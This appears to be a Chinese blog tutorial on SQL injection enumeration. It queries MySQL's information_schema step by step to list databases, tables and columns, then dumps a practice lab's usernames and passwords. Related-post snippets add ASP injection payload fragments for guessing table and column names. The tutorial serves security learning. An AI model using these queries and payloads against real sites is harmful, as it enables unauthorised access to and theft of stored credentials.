sql注入猜解庫,表,列!

2022-08-19 17:12:09 字數 2373 閱讀 9357

mysql有乙個系統資料庫information_schema,儲存著所有的資料相關資訊,一般的,可以利用該錶進行一次完整的注入。以下為一般的流程。

猜資料庫:

select schema_name from information_schema.schemata; 

mariadb [information_schema]> select


schema_name from information_schema.schemata;


+--------------------+


| schema_name |


+--------------------+


| information_schema |


| cms |


| performance_schema |


| mysql |


| test |


+--------------------+


5 rows in set (0.001 sec)

猜某庫的資料表名:

select table_name from information_schema.tables where table_schema = '

test

';

mariadb [information_schema]> select table_name from information_schema.tables where table_schema = '


test';


+------------+


| table_name |


+------------+


| person |


| emails |


| referers |


| users |


| uagents |


| runoob_tbl |


+------------+


6 rows in set (0.001 sec)

猜某錶的所有列:

select column_name from information_schema.columns where table_name ='

users

';

mariadb [information_schema]> select column_name from information_schema.columns where table_name ='


users';


+---------------------+


| column_name |


+---------------------+


| user |


| current_connections |


| total_connections |


| id |


| username |


| password |


+---------------------+


6 rows in set (0.001 sec)

猜取某列的內容:

select username,password from test.users;

mariadb [information_schema]> select


username,password from test.users;


+----------+------------+


| username | password |


+----------+------------+


| dumb | dumb |


| angelina | i-kill-you |


| dummy | p@ssword |


| stupid | stupidity |


| superman | genious |


| batman | mob!le |


| admin | admin |


| admin1 | admin1 |


| admin2 | admin2 |


| admin3 | admin3 |


| dhakkan | dumbo |


| admin4 | admin4 |


+----------+------------+


13 rows in set (0.000 sec)

SQL注入 表的猜解

表名 列名 列長度 具體值 例如 注入點 猜解表名 and exists select from 猜測的表名 猜解列名 and exists select 猜測的列名 from 已知表名 猜測列長度 and select top 1 len 已知列名 from admin 猜測的值長度 如5 top...

sql注入,手動猜表名欄位名

方法從網上看來的,記下來以後看。1,猜表名 錯誤結果顯示公尺有user表。abc.asp?id 12 and 0 select count from admin 載入。說明存在表admin。2,猜欄位名 abc.asp?id 12 and 0 select count id from admin 載...

SQL注入(三) sql注入 bugku

原理 mysql 在使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,例如 aa 5c 就是乙個 漢字 前乙個 ascii碼大於 128 才能到漢字的範圍 我們在過濾 的時候,往往利用的思 路是將 轉換為 換的函式或者思路會在每一關遇到的時候介紹 因此我們在此想辦法將 前面新增的 除掉,一般有兩種...